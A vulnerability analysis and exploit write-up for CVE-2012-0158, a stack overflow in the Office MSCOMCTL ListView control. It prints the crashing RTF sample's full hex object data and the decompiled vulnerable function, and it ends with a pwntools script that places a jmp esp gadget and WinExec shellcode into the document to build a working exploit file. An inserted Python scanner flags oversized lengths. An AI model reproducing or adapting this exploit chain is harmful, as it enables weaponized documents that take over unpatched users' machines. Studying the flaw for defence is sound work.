CVE-2012-0158 Office Stack Overflow

Environment:

Windows 10
Office 2007

Analysis

Sample poc.doc:

{\rtf1
{\fonttbl{\f0\fnil\fcharset0 Verdana;}}
\viewkind4\uc1\pard\sb100\sa100\lang9\f0\fs22\par
\pard\sa200\sl276\slmult1\lang9\fs22\par
{\object\objocx
{\*\objdata
01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E32000000000000000000000E0000
D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFFFEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F02836280000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000060000000000000003004F00430058004E0041004D004500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000160000000000000043006F006E00740065006E007400730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000020000007E05000000000000FEFFFFFFFEFFFFFF030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F0000001000000011000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF009203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004C00690073007400560069006500770041000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB010006001C000000000000000000000000060001560A000001EFCDAB00000500985D6501070000000800008005000080000000000000000000000000000000001FDEECBD010005009017190000000800000049746D736400000002000000010000000C000000436F626A6400000082820000828200000000000000000000000000004141414100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000
}
}
}

Opening the sample directly crashes Office.
Attaching WinDbg to the process while this happens:
(screenshot: WinDbg)
EIP has been hijacked to 0x41414141, so the return address was clearly overwritten by "AAAA".
The call stack itself shows no useful information.
Inspecting the stack contents, the nearest function address is in MSCOMCTL.OCX:
(screenshot: WinDbg)
Find the symbol file MSCOMCTL.dbg, put it in the same directory as MSCOMCTL.OCX, load the module in IDA and jump to the address found on the stack:

HRESULT __stdcall CObj::Load(CObj *this, BSTR bstrString)
{
  struct IStream *v2; // ebx
  HRESULT result; // eax
  HRESULT v4; // esi
  char v5[4]; // [esp+Ch] [ebp-14h]  record tag ("Cobj")
  SIZE_T dwBytes; // [esp+14h] [ebp-Ch]  length taken from the stream
  char v7[4]; // [esp+18h] [ebp-8h]  4-byte destination of the copy
  int v8; // [esp+1Ch] [ebp-4h]

  v2 = (struct IStream *)bstrString;
  // Read the 12-byte record header (tag, 4 bytes, length) onto the stack
  result = ReadBytesFromStreamPadded(v5, (struct IStream *)bstrString, 0xCu);
  if ( result >= 0 )
  {
    // Only a lower bound on the length is checked; there is no upper bound
    if ( *(_DWORD *)v5 == 'jboC' && dwBytes >= 8 )
    {
      v4 = ReadBytesFromStreamPadded(v7, v2, dwBytes);// performs the copy: dwBytes bytes into the 4-byte v7
      if ( v4 >= 0 )
      {
        if ( !*(_DWORD *)v7 )
          goto LABEL_8;
        bstrString = 0;
        v4 = ReadBstrFromStreamPadded((UINT)&bstrString, v2);
        if ( v4 >= 0 )
        {
          CObj::SetKey((CObj *)((char *)this - 36), bstrString);
          SysFreeString(bstrString);
LABEL_8:
          if ( v8 )
            v4 = ReadVariantFromStream((struct tagVARIANT *)((char *)this + 20), v2);
          return v4;
        }
      }
      return v4;
    }
    result = 0x8000FFFF;
  }
  return result;
}

Attaching IDA for dynamic debugging confirms that the return address on the stack is overwritten with "AAAA" exactly when CObj::Load returns.
Here the program calls ReadBytesFromStreamPadded(v5, (struct IStream *)bstrString, 0xCu) to copy the first 0xC bytes of the OLE object's Contents stream onto the stack. v5 receives the data header, which is checked to be "Cobj"; it is followed by the data length, which lands in dwBytes. After checking that this length is not less than 8, the code copies that many bytes onto the stack. Since dwBytes is attacker-controlled, a copy length larger than the space reserved on the stack causes a stack overflow.
Looking at the sample file again:
It is in RTF format; for details see:

https://www.freebuf.com/vuls/161753.html

Opening the sample directly in offvis does not recognize the OLE data:
(screenshot: OLE)
This is because the OLE data is stored as a hex stream.
Extract the hex stream following D0CF11E (the OLE header signature), save it, and parse it again.
First inspect the file with OleFileView or oletools.
There are three main streams:
(screenshot: streams)
OCXNAME declares the object to be a ListViewA control, which can also be confirmed from the registry entry for its CLSID:
(screenshot: clsid)
(screenshot: mscomctl)
The handler is located in MSCOMCTL.
So the whole problem lies in MSCOMCTL's handling of the ListViewA control: when processing the Contents stream, after checking the "Cobjd" header it copies the following data onto the stack using the length defined in the file, causing a stack overflow.
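As an added, defender-side illustration (not part of the original post), the following Python script mirrors the steps above: it pulls the hex text out of the RTF \objdata group, carves the OLE container starting at the D0CF11E0 header, and walks every "Cobj" record to report the length field that MSCOMCTL copies onto the stack. The 12-byte header layout (tag, 4 unnamed bytes, length) follows the decompiled CObj::Load above; the 8-byte safe limit, the helper names and the sample bytes are constructed assumptions.

```python
import re
import struct

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")   # compound-file header signature
COBJ_TAG = b"Cobj"
# Assumption: a legitimate record is v7 (4 bytes) plus v8 (4 bytes), i.e. 8 bytes,
# which is exactly the lower bound CObj::Load checks; anything larger overflows.
MAX_SAFE_LEN = 8

def extract_objdata_hex(rtf: bytes) -> bytes:
    """Return the hex text of the first \\objdata group with whitespace removed."""
    m = re.search(rb"\\objdata\s*([0-9A-Fa-f\s]+)", rtf)
    return b"" if m is None else re.sub(rb"\s+", b"", m.group(1))

def carve_ole(hex_text: bytes) -> bytes:
    """Decode the hex stream and return the bytes from the OLE header onward."""
    if len(hex_text) % 2:
        hex_text = hex_text[:-1]          # drop a dangling nibble from a truncated dump
    data = bytes.fromhex(hex_text.decode("ascii"))
    idx = data.find(OLE_MAGIC)
    return b"" if idx < 0 else data[idx:]

def check_cobj_records(ole: bytes):
    """Report (offset, declared_length, overflows) for every 'Cobj' record header."""
    findings = []
    pos = ole.find(COBJ_TAG)
    while pos >= 0:
        if pos + 12 <= len(ole):
            # 12-byte header as read by CObj::Load: tag, 4 bytes IDA left unnamed, dwBytes
            declared = struct.unpack_from("<I", ole, pos + 8)[0]
            findings.append((pos, declared, declared > MAX_SAFE_LEN))
        pos = ole.find(COBJ_TAG, pos + 1)
    return findings

def scan_rtf(rtf: bytes):
    """End-to-end: RTF bytes in, list of Cobj findings out."""
    return check_cobj_records(carve_ole(extract_objdata_hex(rtf)))

def build_sample(declared_len: int) -> bytes:
    """Constructed RTF fragment (not the page's sample) carrying one Cobj record."""
    ole = (OLE_MAGIC + b"\x00" * 16 + COBJ_TAG + b"d\x00\x00\x00"
           + struct.pack("<I", declared_len) + b"A" * 16)
    prefix = bytes.fromhex("0105000002000000")  # constructed OLE1 preamble before the header
    return (b"{\\rtf1{\\object\\objocx{\\*\\objdata\n"
            + (prefix + ole).hex().upper().encode("ascii") + b"\n}}}")

if __name__ == "__main__":
    for off, length, bad in scan_rtf(build_sample(0x8282)):
        print(f"Cobj at +{off}: declared length 0x{length:X} {'OVERFLOW' if bad else 'ok'}")
```

Run against a real document by passing its bytes to scan_rtf; a declared length far above 8, like the sample's 0x8282, is the signal to quarantine the file.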

POC

The length in the sample is set to 0x8282, so the whole shellcode fits directly. We only need to replace the AAAA that caused the crash with the address of a jmp esp and write the shellcode onto the stack (MSCOMCTL.OCX has no protections). While debugging, search MSCOMCTL.OCX for "\xFF\xE4" (jmp esp), place the shellcode after it, and set the function addresses specific to Windows 10:

WinExec("calc.exe", 5)
ExitProcess(0)

Find the function addresses with WinDbg or dllexp:
(screenshot: WinDbg)
(screenshot: dllexp)
EXP:

from pwn import *
# Python 2 / pwntools 2.x style script: str holds both text and raw bytes
shellcode=asm("push ebp\n\
mov ebp,esp\n\
xor eax,eax\n\
push eax\n\
mov eax,0x6578652e\n\
push eax\n\
mov eax,0x636c6163\n\
push eax\n\
mov eax,esp\n\
push 5\n\
push eax\n\
mov eax,0x753039f0/*address of WinExec*/\n\
call eax\n\
xor eax,eax\n\
push eax\n\
mov eax,0x752c3a20/*address of ExitProcess*/\n\
call eax\n\
mov esp,ebp\n\
pop ebp")
# address of the jmp esp gadget in MSCOMCTL.OCX followed by a NOP sled
jmp_esp="\x5b\xc0\x63\x27\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode=jmp_esp+shellcode
shellcode_str=shellcode.encode("hex")
with open("./poc.doc","rb+") as f:
    ans=f.read()
    # the hex text "41414141" is the AAAA that overwrote the return address
    index=ans.find("41414141")
    final=ans.replace(ans[index:index+len(shellcode_str)],shellcode_str)
    #print final
with open("./final_poc.doc","wb+") as f2:
    f2.write(final)
# To cope with a changing load address,
# the shellcode could obtain a kernel32 address from MSCOMCTL.OCX and compute the base from an offset

(screenshot: PWN)